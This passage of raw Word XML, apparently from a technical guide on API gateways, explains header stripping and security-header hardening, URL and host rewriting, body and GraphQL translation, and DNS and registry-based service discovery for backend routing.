        <w:lastRenderedPageBreak/>
        <w:t>Header Manipulation — What the Gateway Adds, Removes, and Rewrites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4DCA9A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Security-motivated header removal:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5962399B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway strips headers that clients shouldn't be able to inject into the backend:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2848E0FA" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEB9F5B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Remove-Request-Headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004D12F2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  - X-Internal-User-ID    (backend trusts this — client must not be able to set it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC79D3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  - X-Admin-Override      (internal admin flag — client injection would bypass auth)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503A5810" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  - X-Forwarded-For       (rebuild from gateway's knowledge of real client IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69513FD1" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Context injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0A253E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>After authentication and routing, the gateway injects contextual information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3943A014" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7260F01C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-Request-ID: a7f3c2d1-4e5b-6c7d-8e9f-0a1b2c3d4e5f   (distributed trace correlation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE86201" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-User-ID: user123                                      (from validated JWT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D046F57" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-User-Roles: admin,user                               (from JWT claims)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E305889" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-Forwarded-For: 203.0.113.1                           (real client IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC16A64" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-Forwarded-Host: api.example.com                      (original host header)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1B6A60" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-Forwarded-Proto: https                               (original protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CCBC04" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-Gateway-Timestamp: 2024-01-15T10:30:45.123Z          (when gateway received request)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155C8CE" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response header security hardening:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0305817F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway adds security headers to all responses (so backend teams don't need to implement them):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0545A5F4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BFC39B0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Strict-Transport-Security: max-age=31536000; includeSubDomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763E00AC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-Content-Type-Options: nosniff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACBF0B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>X-Frame-Options: DENY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5529ECE0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Content-Security-Policy: default-src 'self'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44712C16" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>Referrer-Policy: strict-origin-when-cross-origin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B5123F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>And removes information-leaking headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7189D4F3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBB54DB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Remove-Response-Headers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B322A8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  - Server                (reveals web server software and version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534583B6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  - X-Powered-By          (reveals framework — PHP, ASP.NET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDAC08C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  - X-AspNet-Version      (reveals ASP.NET version)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F19961F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>URL Rewriting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A1063D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway can rewrite request URLs before forwarding to backends — decoupling external API URLs from internal service URLs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03795058" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prefix stripping:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600BEEF2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44DAB5D8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Incoming: GET /api/v2/payments/123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F09F2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Strip:    /api/v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD40A9" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Forward:  GET /payments/123 → payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229672A1" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The backend doesn't know it's behind an API gateway or that the public URL has a version prefix.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B85F29" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Path rewriting (regex-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C27651D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5ECC5F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Incoming: GET /users/123/orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D33EB7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Rewrite:  GET /orders?user_id=123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3419C308" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Forward:  GET /orders?user_id=123 → order-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5BC77F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Complex URL transformations allow the public API structure to differ from internal service structure — enabling API redesign without changing backend services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0138D0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Host rewriting:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ED700F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F0C9E3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Incoming Host: api.example.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7DEC86" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:lastRenderedPageBreak/>
        <w:t>Forward Host:  payment-service.internal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E7891A" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The backend receives requests with the internal service hostname, not the public API hostname. Useful when backends use the Host header for routing internally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05837BAC" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Body Transformation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202C2511" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>JSON to XML translation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5896BDC3" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Legacy backends may only support XML while modern clients send JSON. The gateway transforms request bodies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FAD1B6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="164BEDDD" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Client sends: {"amount": 100, "currency": "USD"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F0FA58" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Gateway transforms to: &lt;payment&gt;&lt;amount&gt;100&lt;/amount&gt;&lt;currency&gt;USD&lt;/currency&gt;&lt;/payment&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC0F19D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Forwards: XML body to legacy backend</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0101E064" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The performance cost of body transformation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> The gateway must </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>buffer the entire request body</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> before transformation. For large bodies (file uploads, bulk API requests), this adds latency and memory pressure. Body transformation at the gateway is appropriate for small-to-medium payloads. Large body transformations should happen in dedicated transformation services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A1353" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GraphQL to REST translation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D943D6E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Some gateways (AWS AppSync, Apollo Federation) translate GraphQL queries from clients to multiple REST API calls to backend services, aggregate the results, and return a unified GraphQL response. This is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>schema stitching</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>federation</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> pattern — clients get GraphQL's flexible querying while backends expose simple REST APIs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0587F2" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The GraphQL gateway pattern:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D005E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4543EB7E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Client: GraphQL query { user(id: "123") { name orders { total } } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AE1657" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="069BF215" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A2C761" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  1. GET /users/123 → {name: "Alice"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC78D1C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  2. GET /orders?user_id=123 → [{total: 99.99}, {total: 49.99}]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447D3FD7" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018"/>
    <w:p w14:paraId="1406FEB0" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Gateway assembles: {user: {name: "Alice", orders: [{total: 99.99}, {total: 49.99}]}}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6568C5" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Client receives: unified GraphQL response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C714EAB" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:pict w14:anchorId="0D126ECE">
          <v:rect id="_x0000_i3829" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E3CEC4" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Service Discovery and Dynamic Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7FE41B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How the Gateway Knows Where to Route</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245ED4C6" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The API gateway must know the </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>current, healthy instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> of each backend service. In static environments, this is hardcoded configuration. In dynamic environments (Kubernetes, containerized microservices), instances start and stop constantly — the gateway needs </w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>real-time service discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515783C" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Static configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B27A81" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>YAML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71125F22" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D88500" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">  payment-service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55732F55" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">    hosts:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EEBC405" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      - 10.0.1.5:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CBBC1F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      - 10.0.1.6:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FCD5F8" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t xml:space="preserve">      - 10.0.1.7:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A9435E" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Simple but requires manual updates when instances change. Appropriate for stable, manually managed infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A306F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DNS-based service discovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0570F083" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway resolves the backend hostname via DNS, which returns all healthy instance IPs (managed by a service registry like Consul DNS or Kubernetes DNS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C7916D" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B22F981" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>payment-service.default.svc.cluster.local → [10.0.1.5, 10.0.1.6, 10.0.1.7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CAD42F" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway periodically re-resolves DNS to pick up new instances. DNS TTL determines how quickly changes propagate — short TTLs (10–30 seconds) for dynamic environments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3ACE8B" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Problem with DNS load balancing:</w:t>
      </w:r>
      <w:r w:rsidRPr="00563018">
        <w:t> DNS returns all IPs but the gateway's TCP connection pool is established to specific IPs. New instances added to DNS are not automatically added to existing connection pools until the gateway makes a new connection. The gateway must actively re-resolve DNS and update its load balancing pool — not just rely on new TCP connections to pick up new IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A125833" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service registry integration (Consul, Eureka, etcd):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCE9516" w14:textId="77777777" w:rsidR="00563018" w:rsidRPr="00563018" w:rsidRDefault="00563018" w:rsidP="00563018">
      <w:r w:rsidRPr="00563018">
        <w:t>The gateway integrates directly with the service registry, subscribing to health change events:</w:t>
      </w:r>
    </w:p>
